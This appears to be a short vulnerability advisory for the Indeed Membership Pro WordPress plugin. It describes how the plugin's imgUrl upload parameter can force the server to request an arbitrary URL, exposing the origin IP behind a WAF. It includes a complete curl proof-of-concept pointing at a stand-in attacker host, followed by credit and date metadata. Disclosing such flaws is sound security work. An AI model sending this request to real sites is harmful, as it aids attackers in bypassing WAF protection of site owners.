In addition to cropping/rotating/resizing an image of your choosing, you can abuse the imgUrl feature on versions that it's available on (7.4.2+ at least) to make an HTTP request to any site you want. For example, by having it connect to a site you control, you can determine the IP address of the origin even when the site is behind a third party WAF such as Fastly, Cloudflare, Sucuri, etc:
curl -d "imgUrl=https://some-evil-host.evil/pwned.png" -d 'imgInitW=1' -d 'imgInitH=1' -d 'imgW=1' -d 'imgH=1' -d 'imgY1=1' -d 'imgX1=1' -d 'cropW=1' -d 'cropH=1' -d 'rotation=0' https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
UNKNOWN
James Fraser
fwaggle
No
2019-02-26 (about 4 years ago)
2019-05-27 (about 4 years ago)
2020-02-07 (about 3 years ago)